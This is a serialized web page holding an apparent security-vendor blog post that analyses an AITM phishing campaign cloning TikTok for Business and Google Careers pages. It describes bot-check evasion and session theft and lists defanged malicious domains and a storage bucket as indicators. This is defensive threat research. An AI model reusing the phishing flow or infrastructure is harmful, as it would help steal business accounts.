[{"data":1,"prerenderedAt":3604},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":108,"navbar-resource-highlight":182,"blog/tiktok-phishing":226},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"query":14,"data":15,"variations":20,"lastUpdated":21,"firstPublished":22,"testRatio":23,"createdBy":24,"lastUpdatedBy":25,"folders":26,"meta":27,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",[],{"type":16,"url":17,"text":18,"link":19},"web-banner","https://pushsecurity.com/resources/browser-attacks-report","Get our latest report analyzing browser attack techniques in 2026",{},{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],{"kind":28,"lastPreviewUrl":29,"breakpoints":30,"hasAutosaves":34},"data","",{"xsmall":31,"small":32,"medium":33},320,640,768,true,"ga0kpxjhh76",{"createdDate":37,"id":38,"name":39,"modelId":40,"published":13,"stageModifiedSincePublish":6,"query":41,"data":42,"variations":97,"lastUpdated":98,"firstPublished":99,"testRatio":23,"createdBy":100,"lastUpdatedBy":101,"folders":102,"meta":103,"rev":107},1774965361051,"fd266d0172cc47429be7ad10f48c99ad","always visible banner","0678d178ec8b41efb8a23c09dba7874d",[],{"ctaText":43,"text":44,"url":29,"blocks":45,"state":93},"ewrererw","testrfesssssssssss",[46,73,81],{"@type":47,"@version":48,"id":49,"component":50,"responsiveStyles":63},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":51,"tag":51,"options":52,"isRSC":62},"TopBannerContent",{"text":53,"ctaText":54,"url":55,"mainText":56,"cta":59},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https://pushsecurity.com/webinar/state-of-browser-security",{"content":57,"fontSize":58},"\u003Cp>Meet Push's browser security experts at BlackHat 2026.\u003C/p>","text-base",{"content":60,"fontSize":58,"url":61},"\u003Cp>Book a meeting →\u003C/p>","https://pushsecurity.com/events/blackhat-2026-meeting",null,{"large":64},{"display":65,"flexDirection":66,"position":67,"flexShrink":68,"boxSizing":69,"marginTop":70,"marginBottom":70,"fontSize":71,"fontWeight":72},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"@type":47,"@version":48,"id":74,"component":75,"responsiveStyles":79},"builder-a2e1f4b9f30b464bb814d7f5de5b0aa7",{"name":76,"options":77,"isRSC":62},"Custom Code",{"code":78,"scriptsClientOnly":6},"\u003Cstyle>\n  .top-banner.bg-web-orange{background:rgb(114, 79, 255);}\n\u003C/style>\n",{"large":80},{"display":65,"flexDirection":66,"position":67,"flexShrink":68,"boxSizing":69},{"id":82,"@type":47,"tagName":83,"properties":84,"responsiveStyles":88},"builder-pixel-o503s4fpvk","img",{"src":85,"aria-hidden":86,"alt":29,"role":87,"width":68,"height":68},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":89},{"height":68,"width":68,"display":90,"opacity":68,"overflow":91,"pointerEvents":92},"block","hidden","none",{"deviceSize":94,"location":95},"large",{"path":29,"query":96},{},{},1783541846936,1774968080803,"ST0tXQM8slWpFrmioqKHmENB2qe2","kYgMv6WsbvfmlOUYqR2SFwGzw6e2",[],{"kind":104,"lastPreviewUrl":105,"hasLinks":6,"breakpoints":106,"hasErrors":6,"hasAutosaves":6},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default",{"xsmall":31,"small":32,"medium":33},"kyujw1aptq",[109,145],{"createdDate":110,"id":111,"name":112,"modelId":113,"published":13,"stageModifiedSincePublish":6,"query":114,"data":115,"variations":138,"lastUpdated":139,"firstPublished":140,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":141,"meta":142,"rev":144},1776247359804,"9136a8f18b3b4a6ba29b8653a99372b1","testimonial-inductive-automation","20d9eaa352304613b3d1a794b400703d",[],{"link":116,"type":117,"testimonialLink":118,"testimonial":119},{},"testimonial","/customer-stories/inductive-automation",{"@type":120,"id":121,"model":117,"value":122},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79",{"query":123,"folders":124,"createdDate":125,"id":121,"name":126,"modelId":127,"published":13,"data":128,"variations":132,"lastUpdated":133,"firstPublished":134,"testRatio":23,"createdBy":100,"lastUpdatedBy":100,"meta":135,"rev":137},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":129,"jobTitle":130,"quote":126,"image":131},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":28,"lastPreviewUrl":29,"breakpoints":136,"hasAutosaves":34},{"small":32,"medium":33},"e8bsg4qrgtu",{},1776247404986,1776247404973,[],{"breakpoints":143,"kind":28,"lastPreviewUrl":29,"hasAutosaves":6},{"xsmall":31,"small":32,"medium":33},"g9lqcuxphw7",{"createdDate":146,"id":147,"name":148,"modelId":113,"published":13,"meta":149,"stageModifiedSincePublish":6,"query":151,"data":152,"variations":178,"lastUpdated":179,"firstPublished":180,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":181,"rev":144},1776255761419,"05a9322735fc427db12e2740e4302300","Report: 2026 Browser Attack Techniques",{"breakpoints":150,"kind":28,"lastPreviewUrl":29,"hasAutosaves":6},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":153,"link":172,"type":175,"title":148,"description":176,"image":177},{"@type":120,"id":154,"model":117,"value":155},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":156,"folders":157,"createdDate":158,"id":154,"name":159,"modelId":127,"published":13,"data":160,"variations":166,"lastUpdated":167,"firstPublished":168,"testRatio":23,"createdBy":100,"lastUpdatedBy":24,"meta":169,"rev":171},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":161,"jobTitle":162,"author":163,"qoute":29,"quote":164,"image":165},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":28,"lastPreviewUrl":29,"breakpoints":170,"hasAutosaves":34},{"small":32,"medium":33},"ulhc0im1hfo",{"text":173,"url":174},"Download now","/resources/browser-attacks-report","resource","Learn about the latest techniques being used in the wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{},1776255810913,1776255810900,[],[183,205],{"createdDate":184,"id":185,"name":148,"modelId":186,"published":13,"meta":187,"stageModifiedSincePublish":6,"query":189,"data":190,"variations":200,"lastUpdated":201,"firstPublished":202,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":203,"rev":204},1776256900280,"1f429607996e4e5fae8fe3f9b9610e55","4829faa81e7c4ee8bd2d000e160e8d3c",{"breakpoints":188,"kind":28,"lastPreviewUrl":29,"hasAutosaves":6},{"xsmall":31,"small":32,"medium":33},[],{"testimonial":191,"link":199,"type":175,"title":148,"description":176,"image":177},{"@type":120,"id":154,"model":117,"value":192},{"query":193,"folders":194,"createdDate":158,"id":154,"name":159,"modelId":127,"published":13,"data":195,"variations":196,"lastUpdated":167,"firstPublished":168,"testRatio":23,"createdBy":100,"lastUpdatedBy":24,"meta":197,"rev":171},[],[],{"video":161,"jobTitle":162,"author":163,"qoute":29,"quote":164,"image":165},{},{"kind":28,"lastPreviewUrl":29,"breakpoints":198,"hasAutosaves":34},{"small":32,"medium":33},{"text":173,"url":174},{},1776256937553,1776256937540,[],"xggsv10v1q9",{"createdDate":206,"id":207,"name":208,"modelId":186,"published":13,"stageModifiedSincePublish":6,"query":209,"data":210,"variations":220,"lastUpdated":221,"firstPublished":222,"testRatio":23,"createdBy":24,"lastUpdatedBy":24,"folders":223,"meta":224,"rev":204},1776256949234,"ce043785b71b4ece98eac811ecf4ba10","inductive-automation",[],{"link":211,"type":117,"testimonial":212,"testimonialLink":118},{},{"@type":120,"id":121,"model":117,"value":213},{"query":214,"folders":215,"createdDate":125,"id":121,"name":126,"modelId":127,"published":13,"data":216,"variations":217,"lastUpdated":133,"firstPublished":134,"testRatio":23,"createdBy":100,"lastUpdatedBy":100,"meta":218,"rev":137},[],[],{"author":129,"jobTitle":130,"quote":126,"image":131},{},{"kind":28,"lastPreviewUrl":29,"breakpoints":219,"hasAutosaves":34},{"small":32,"medium":33},{},1776256974140,1776256974130,[],{"breakpoints":225,"kind":28,"lastPreviewUrl":29,"hasAutosaves":6},{"xsmall":31,"small":32,"medium":33},{"id":227,"title":228,"authorsCollection":229,"content":237,"extension":955,"faqItemsCollection":956,"faqTitle":62,"featured":6,"hashTags":62,"meta":958,"metaTitle":959,"ogImage":62,"publishedDate":960,"relatedBlogPostsCollection":961,"slug":3580,"stem":3581,"subtitle":62,"summary":3582,"synopsis":3593,"sys":3594,"tagsCollection":3597,"__hash__":3603},"blog/blog/tiktok-phishing.json","Attackers are now targeting business TikTok accounts using session-stealing phishing kits",{"items":230},[231],{"fullName":232,"firstName":233,"jobTitle":234,"profilePicture":235},"Dan Green","Dan","Threat Research",{"url":236},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"json":238,"links":849},{"nodeType":239,"data":240,"content":241},"document",{},[242,251,273,282,286,296,303,310,317,342,349,368,375,381,390,397,403,409,415,421,427,433,439,442,450,457,464,484,530,537,583,589,592,600,620,627,739,746,759,767,770,778,785,792,837,843],{"nodeType":243,"data":244,"content":245},"paragraph",{},[246],{"nodeType":247,"value":248,"marks":249,"data":250},"text","We recently detected and blocked a new style of phishing page targeting TikTok for Business accounts — used by company marketing teams to manage ad campaigns. ",[],{},{"nodeType":243,"data":252,"content":253},{},[254,258,269],{"nodeType":247,"value":255,"marks":256,"data":257},"On closer analysis, we identified a cluster of linked pages featuring both TikTok themes, and Google themed “Schedule a Call” imitation pages, ",[],{},{"nodeType":259,"data":260,"content":262},"hyperlink",{"uri":261},"https://sublime.security/blog/google-careers-impersonation-credential-phishing-scam-with-endless-variation/",[263],{"nodeType":247,"value":264,"marks":265,"data":268},"similar to a campaign reported late last year",[266],{"type":267},"underline",{},{"nodeType":247,"value":270,"marks":271,"data":272},", suggesting a continuity of this previous campaign.",[],{},{"nodeType":274,"data":275,"content":281},"embedded-entry-block",{"target":276},{"sys":277},{"id":278,"type":279,"linkType":280},"6mR622LOKuhGRfBXkIsUrx","Link","Entry",[],{"nodeType":283,"data":284,"content":285},"hr",{},[],{"nodeType":287,"data":288,"content":289},"heading-1",{},[290],{"nodeType":247,"value":291,"marks":292,"data":295},"Campaign breakdown",[293],{"type":294},"bold",{},{"nodeType":243,"data":297,"content":298},{},[299],{"nodeType":247,"value":300,"marks":301,"data":302},"Push researchers have identified a cluster of newly registered phishing pages all registered on the 24th March within a 9-second window. All of the pages are hosted behind Cloudflare with the same registrar (Nicenic International Group, commonly abused for bulk phishing domain registration). ",[],{},{"nodeType":243,"data":304,"content":305},{},[306],{"nodeType":247,"value":307,"marks":308,"data":309},"The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. A full list of identified domains is provided later, but we expect this to grow significantly as the campaign ramps up. ",[],{},{"nodeType":243,"data":311,"content":312},{},[313],{"nodeType":247,"value":314,"marks":315,"data":316},"Victims are tricked into clicking a malicious link that takes them to one of two page styles. ",[],{},{"nodeType":318,"data":319,"content":320},"unordered-list",{},[321,332],{"nodeType":322,"data":323,"content":324},"list-item",{},[325],{"nodeType":243,"data":326,"content":327},{},[328],{"nodeType":247,"value":329,"marks":330,"data":331},"A TikTok for Business cloned page ",[],{},{"nodeType":322,"data":333,"content":334},{},[335],{"nodeType":243,"data":336,"content":337},{},[338],{"nodeType":247,"value":339,"marks":340,"data":341},"A Google careers “Schedule a call” cloned page",[],{},{"nodeType":243,"data":343,"content":344},{},[345],{"nodeType":247,"value":346,"marks":347,"data":348},"In both cases, the victim is required to complete a basic information form before being served with a malicious login page that is in fact fronting a reverse proxy AITM phishing kit. ",[],{},{"nodeType":243,"data":350,"content":351},{},[352,356,364],{"nodeType":247,"value":353,"marks":354,"data":355},"While Push has limited visibility of the initial delivery mechanism in this case, we can assume that a similar method of dynamically generated email is being used to the ",[],{},{"nodeType":259,"data":357,"content":358},{"uri":261},[359],{"nodeType":247,"value":360,"marks":361,"data":363},"previously identified campaign",[362],{"type":267},{},{"nodeType":247,"value":365,"marks":366,"data":367}," reported by Sublime in October, featuring a similar Google Careers cloned page. ",[],{},{"nodeType":243,"data":369,"content":370},{},[371],{"nodeType":247,"value":372,"marks":373,"data":374},"You can see an example of the page load below. ",[],{},{"nodeType":274,"data":376,"content":380},{"target":377},{"sys":378},{"id":379,"type":279,"linkType":280},"3wjGpMs3qJsZaar2LIlQbE",[],{"nodeType":382,"data":383,"content":384},"heading-2",{},[385],{"nodeType":247,"value":386,"marks":387,"data":389},"Attack flow",[388],{"type":294},{},{"nodeType":243,"data":391,"content":392},{},[393],{"nodeType":247,"value":394,"marks":395,"data":396},"When the link is first clicked, the page is silently redirected from a legitimate Google Storage site before loading the page. A Cloudflare Turnstile check is used to prevent security bots from analyzing the page, before loading either a TikTok or Google themed page. Progressing through the forms ultimately serves up an AITM phishing page.",[],{},{"nodeType":274,"data":398,"content":402},{"target":399},{"sys":400},{"id":401,"type":279,"linkType":280},"5zoUeGW0zlC7u9vtHolskM",[],{"nodeType":274,"data":404,"content":408},{"target":405},{"sys":406},{"id":407,"type":279,"linkType":280},"7eyc9v7xVZzXK8jY53I9li",[],{"nodeType":274,"data":410,"content":414},{"target":411},{"sys":412},{"id":413,"type":279,"linkType":280},"37kj78jit44Mp6LCi7tEsC",[],{"nodeType":274,"data":416,"content":420},{"target":417},{"sys":418},{"id":419,"type":279,"linkType":280},"4qaPOlBYeIfEoG2OZvl8lI",[],{"nodeType":274,"data":422,"content":426},{"target":423},{"sys":424},{"id":425,"type":279,"linkType":280},"7cIFMDwHF2R8vswtJzWdKn",[],{"nodeType":274,"data":428,"content":432},{"target":429},{"sys":430},{"id":431,"type":279,"linkType":280},"5YtrhvypdLkcSUoj2IEj24",[],{"nodeType":274,"data":434,"content":438},{"target":435},{"sys":436},{"id":437,"type":279,"linkType":280},"7cc4UclvVVW3YuUVB8PpJp",[],{"nodeType":283,"data":440,"content":441},{},[],{"nodeType":287,"data":443,"content":444},{},[445],{"nodeType":247,"value":446,"marks":447,"data":449},"Why TikTok???",[448],{"type":294},{},{"nodeType":243,"data":451,"content":452},{},[453],{"nodeType":247,"value":454,"marks":455,"data":456},"Given that the majority of phishing pages intercepted by Push tend to replicate core SSO platforms like Google and Microsoft, targeting TikTok is a notable development, though not entirely uncommon. ",[],{},{"nodeType":243,"data":458,"content":459},{},[460],{"nodeType":247,"value":461,"marks":462,"data":463},"TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions. ",[],{},{"nodeType":243,"data":465,"content":466},{},[467,471,480],{"nodeType":247,"value":468,"marks":469,"data":470},"This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut. They instructed viewers to open PowerShell and paste commands that downloaded infostealers from bulletproof hosting infrastructure. ",[],{},{"nodeType":259,"data":472,"content":474},{"uri":473},"https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html",[475],{"nodeType":247,"value":476,"marks":477,"data":479},"One video alone",[478],{"type":267},{},{"nodeType":247,"value":481,"marks":482,"data":483}," hit ~500,000 views and 20,000+ likes.",[],{},{"nodeType":243,"data":485,"content":486},{},[487,491,500,504,513,517,526],{"nodeType":247,"value":488,"marks":489,"data":490},"It’s also a common hunting ground for crypto scammers, like many other social platforms have historically been abused (most commonly Twitter/X). Many of these are done with the full knowledge and consent of “influencers”, but there are also overtly malicious examples such as ",[],{},{"nodeType":259,"data":492,"content":494},{"uri":493},"https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-elon-musk-crypto-giveaway-scam-campaigns-run-rampant-on-tiktok",[495],{"nodeType":247,"value":496,"marks":497,"data":499},"deepfaked videos of Elon Musk",[498],{"type":267},{},{"nodeType":247,"value":501,"marks":502,"data":503}," with overlaid AI-generated audio promoting fake exchanges. ",[],{},{"nodeType":259,"data":505,"content":507},{"uri":506},"https://www.malwarebytes.com/blog/news/2025/10/tiktok-scam-sells-you-access-to-your-own-fake-money",[508],{"nodeType":247,"value":509,"marks":510,"data":512},"TikTok DMs",[511],{"type":267},{},{"nodeType":247,"value":514,"marks":515,"data":516},", like ",[],{},{"nodeType":259,"data":518,"content":520},{"uri":519},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users/",[521],{"nodeType":247,"value":522,"marks":523,"data":525},"other social media apps",[524],{"type":267},{},{"nodeType":247,"value":527,"marks":528,"data":529},", are also a place where attackers can target victims. ",[],{},{"nodeType":243,"data":531,"content":532},{},[533],{"nodeType":247,"value":534,"marks":535,"data":536},"Ultimately, it’s easy to see how access to verified and trustworthy business accounts on TikTok could be abused in the wrong hands. ",[],{},{"nodeType":243,"data":538,"content":539},{},[540,544,553,557,566,570,579],{"nodeType":247,"value":541,"marks":542,"data":543},"It’s worth pointing out too that many/most business users will opt to “log in with Google.” This means that anyone using Google to login to their TikTok account will effectively have both accounts used to distribute ads compromised in one go, opening up the typical ",[],{},{"nodeType":259,"data":545,"content":547},{"uri":546},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[548],{"nodeType":247,"value":549,"marks":550,"data":552},"Google Ad Manager exploitation playbook",[551],{"type":267},{},{"nodeType":247,"value":554,"marks":555,"data":556}," — as well as accessing any further apps accessible via SSO for data theft and extortion. This has become the standard MO for attackers, in campaigns such as the ",[],{},{"nodeType":259,"data":558,"content":560},{"uri":559},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[561],{"nodeType":247,"value":562,"marks":563,"data":565},"Scattered Lapsus$ Hunters AITM phishing",[564],{"type":267},{},{"nodeType":247,"value":567,"marks":568,"data":569}," spree earlier this year, and their ",[],{},{"nodeType":259,"data":571,"content":573},{"uri":572},"https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/",[574],{"nodeType":247,"value":575,"marks":576,"data":578},"recent spate of device code phishing attacks",[577],{"type":267},{},{"nodeType":247,"value":580,"marks":581,"data":582},".",[],{},{"nodeType":274,"data":584,"content":588},{"target":585},{"sys":586},{"id":587,"type":279,"linkType":280},"4H3AzW7q4QBv7pJawSqQBJ",[],{"nodeType":283,"data":590,"content":591},{},[],{"nodeType":287,"data":593,"content":594},{},[595],{"nodeType":247,"value":596,"marks":597,"data":599},"IoCs",[598],{"type":294},{},{"nodeType":243,"data":601,"content":602},{},[603,607,616],{"nodeType":247,"value":604,"marks":605,"data":606},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":259,"data":608,"content":610},{"uri":609},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[611],{"nodeType":247,"value":612,"marks":613,"data":615},"quickly spin up and rotate the sites used",[614],{"type":267},{},{"nodeType":247,"value":617,"marks":618,"data":619}," in the attack chain, often dynamically serving different URLs to site visitors. ",[],{},{"nodeType":243,"data":621,"content":622},{},[623],{"nodeType":247,"value":624,"marks":625,"data":626},"That said, the domains observed in the initial cluster were:",[],{},{"nodeType":318,"data":628,"content":629},{},[630,640,650,660,670,680,690,700,710,720,730],{"nodeType":322,"data":631,"content":632},{},[633],{"nodeType":243,"data":634,"content":635},{},[636],{"nodeType":247,"value":637,"marks":638,"data":639},"welcome.careerscrews[.]com",[],{},{"nodeType":322,"data":641,"content":642},{},[643],{"nodeType":243,"data":644,"content":645},{},[646],{"nodeType":247,"value":647,"marks":648,"data":649},"welcome.careerstaffer[.]com",[],{},{"nodeType":322,"data":651,"content":652},{},[653],{"nodeType":243,"data":654,"content":655},{},[656],{"nodeType":247,"value":657,"marks":658,"data":659},"welcome.careersworkflow[.]com",[],{},{"nodeType":322,"data":661,"content":662},{},[663],{"nodeType":243,"data":664,"content":665},{},[666],{"nodeType":247,"value":667,"marks":668,"data":669},"welcome.careerstransform[.]com",[],{},{"nodeType":322,"data":671,"content":672},{},[673],{"nodeType":243,"data":674,"content":675},{},[676],{"nodeType":247,"value":677,"marks":678,"data":679},"welcome.careersupskill[.]com",[],{},{"nodeType":322,"data":681,"content":682},{},[683],{"nodeType":243,"data":684,"content":685},{},[686],{"nodeType":247,"value":687,"marks":688,"data":689},"welcome.careerssuccess[.]com",[],{},{"nodeType":322,"data":691,"content":692},{},[693],{"nodeType":243,"data":694,"content":695},{},[696],{"nodeType":247,"value":697,"marks":698,"data":699},"welcome.careersstaffgrid[.]com",[],{},{"nodeType":322,"data":701,"content":702},{},[703],{"nodeType":243,"data":704,"content":705},{},[706],{"nodeType":247,"value":707,"marks":708,"data":709},"welcome.careersprogress[.]com",[],{},{"nodeType":322,"data":711,"content":712},{},[713],{"nodeType":243,"data":714,"content":715},{},[716],{"nodeType":247,"value":717,"marks":718,"data":719},"welcome.careersgrower[.]com",[],{},{"nodeType":322,"data":721,"content":722},{},[723],{"nodeType":243,"data":724,"content":725},{},[726],{"nodeType":247,"value":727,"marks":728,"data":729},"welcome.careersengage[.]com",[],{},{"nodeType":322,"data":731,"content":732},{},[733],{"nodeType":243,"data":734,"content":735},{},[736],{"nodeType":247,"value":637,"marks":737,"data":738},[],{},{"nodeType":243,"data":740,"content":741},{},[742],{"nodeType":247,"value":743,"marks":744,"data":745},"Since the pages are all hosted in a single Google Storage bucket, any linked pages/files should be considered to be malicious.",[],{},{"nodeType":318,"data":747,"content":748},{},[749],{"nodeType":322,"data":750,"content":751},{},[752],{"nodeType":243,"data":753,"content":754},{},[755],{"nodeType":247,"value":756,"marks":757,"data":758},"storage.googleapis[.]com/fiz2a4s014vt8q4l5i0m1m7b0gl/",[],{},{"nodeType":243,"data":760,"content":761},{},[762],{"nodeType":247,"value":763,"marks":764,"data":766},"Push customers do not need to take any further action.",[765],{"type":294},{},{"nodeType":283,"data":768,"content":769},{},[],{"nodeType":287,"data":771,"content":772},{},[773],{"nodeType":247,"value":774,"marks":775,"data":777},"About Push Security",[776],{"type":294},{},{"nodeType":243,"data":779,"content":780},{},[781],{"nodeType":247,"value":782,"marks":783,"data":784},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":243,"data":786,"content":787},{},[788],{"nodeType":247,"value":789,"marks":790,"data":791},"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":243,"data":793,"content":794},{},[795,799,808,812,821,825,834],{"nodeType":247,"value":796,"marks":797,"data":798},"To learn more about Push, ",[],{},{"nodeType":259,"data":800,"content":802},{"uri":801},"https://pushsecurity.com/resources/product-brochure",[803],{"nodeType":247,"value":804,"marks":805,"data":807},"check out our latest product overview",[806],{"type":267},{},{"nodeType":247,"value":809,"marks":810,"data":811},", ",[],{},{"nodeType":259,"data":813,"content":815},{"uri":814},"https://pushsecurity.com/product-demo/",[816],{"nodeType":247,"value":817,"marks":818,"data":820},"view our demo library",[819],{"type":267},{},{"nodeType":247,"value":822,"marks":823,"data":824},", or ",[],{},{"nodeType":259,"data":826,"content":828},{"uri":827},"https://pushsecurity.com/demo",[829],{"nodeType":247,"value":830,"marks":831,"data":833},"book some time with one of our team for a live demo",[832],{"type":267},{},{"nodeType":247,"value":580,"marks":835,"data":836},[],{},{"nodeType":274,"data":838,"content":842},{"target":839},{"sys":840},{"id":841,"type":279,"linkType":280},"7ccfmP2yXXmtC1R5BLmKYg",[],{"nodeType":243,"data":844,"content":845},{},[846],{"nodeType":247,"value":29,"marks":847,"data":848},[],{},{"entries":850},{"hyperlink":851,"inline":852,"block":853},[],[],[854,894,900,908,915,921,927,933,939,944,951],{"sys":855,"__typename":856,"content":857,"name":893,"title":62},{"id":278},"InsightTextBlockComponent",{"json":858},{"data":859,"content":860,"nodeType":239},{},[861],{"data":862,"content":863,"nodeType":243},{},[864,868,877,881,889],{"data":865,"marks":866,"value":867,"nodeType":247},{},[],"We’ve ",{"data":869,"content":871,"nodeType":259},{"uri":870},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[872],{"data":873,"marks":874,"value":876,"nodeType":247},{},[875],{"type":267},"reported extensively",{"data":878,"marks":879,"value":880,"nodeType":247},{},[]," about malvertising scams in the past — particularly targeting Google Ad Manager accounts. Attackers take over Ad Manager accounts and use them to deploy even more malicious ads, harvesting account credentials via AITM phishing pages and ClickFix-style malware delivery (dropping infostealers and remote access tools). They also run ",{"data":882,"content":883,"nodeType":259},{"uri":546},[884],{"data":885,"marks":886,"value":888,"nodeType":247},{},[887],{"type":267},"ad fraud campaigns",{"data":890,"marks":891,"value":892,"nodeType":247},{},[]," siphoning company ad budgets into their own pockets. ","Tiktok phishing insight box 1",{"sys":895,"__typename":896,"title":897,"arcadeDemoUrl":898,"playText":899},{"id":379},"ArcadeDemo","Tiktok phishing demo","https://demo.arcade.software/i0NCDltufFhv8xouaTxr?embed","30 secs",{"sys":901,"__typename":902,"title":903,"caption":903,"layoutMode":62,"file":904},{"id":401},"Image","Push example detection timeline showing the initial redirect. In this example Push was configured to Monitor only mode, rather than Block mode.",{"url":905,"width":906,"height":907},"https://images.ctfassets.net/y1cdw1ablpvd/5WAwawK6I0Ez56HE9icvO4/6ad8fedf0c6b72b29b1664ea854593be/image8.png",1802,954,{"sys":909,"__typename":902,"title":910,"caption":910,"layoutMode":62,"file":911},{"id":407},"Initial Cloudflare Turnstile bot check to block security bots from analyzing the page.",{"url":912,"width":913,"height":914},"https://images.ctfassets.net/y1cdw1ablpvd/28rZywTFT0ro4dhWPCfwAJ/6a8342f9bb785db5ed8677939921645d/image6.png",1999,1131,{"sys":916,"__typename":902,"title":917,"caption":917,"layoutMode":62,"file":918},{"id":413},"TikTok for Business themed page.",{"url":919,"width":913,"height":920},"https://images.ctfassets.net/y1cdw1ablpvd/7uoSoE5xwXEBA3tCIOReTX/3e8b06e18097f8625f3edaa92ba770d1/image2.png",1142,{"sys":922,"__typename":902,"title":923,"caption":923,"layoutMode":62,"file":924},{"id":419},"Google Careers themed landing page.",{"url":925,"width":913,"height":926},"https://images.ctfassets.net/y1cdw1ablpvd/5NQmzcYtnsqONZFMljk1Z8/354a8721f4c2195c1aa88b3258a073f1/image1.png",1213,{"sys":928,"__typename":902,"title":929,"caption":929,"layoutMode":62,"file":930},{"id":425},"TikTok for Business themed login page.  The fake page has replaced the “Log in with TikTok” button with “Log in with Google”. ",{"url":931,"width":913,"height":932},"https://images.ctfassets.net/y1cdw1ablpvd/5rDbxr6ZkcbGv2f6opf6TE/c6997fa3fe50426dae17c6578e2c04f1/image4.png",1191,{"sys":934,"__typename":902,"title":935,"caption":935,"layoutMode":62,"file":936},{"id":431},"The TikTok login page has input validation that requires a business email address.",{"url":937,"width":913,"height":938},"https://images.ctfassets.net/y1cdw1ablpvd/1ba6sQzfR3hjeQHyx8zjae/f588da1242c68ea03ee149d489ee272e/image7.png",1127,{"sys":940,"__typename":902,"title":941,"caption":941,"layoutMode":62,"file":942},{"id":437},"Cloned Google login page hosting an AITM phishing kit.",{"url":943,"width":913,"height":920},"https://images.ctfassets.net/y1cdw1ablpvd/6aGrOKJBuwAPalVYgx4P9u/41a456ba585767c6af8637bab392cabf/image5.png",{"sys":945,"__typename":946,"type":947,"ctaText":948,"buttonLabel":949,"buttonColour":950,"buttonUrl":17},{"id":587},"CtaWidget","Custom","Learn about the browser attack techniques security teams must contend with in 2026","Get the Report","sunny orange",{"sys":952,"__typename":946,"type":947,"ctaText":953,"buttonLabel":954,"buttonColour":950,"buttonUrl":55},{"id":841},"Get ahead of the latest browser attacks with our new webinar series, featuring guest experts John Hammond, Troy Hunt, Matt Johansen, and more!","Register Now","json",{"items":957},[],{},"Business TikTok accounts targeted with 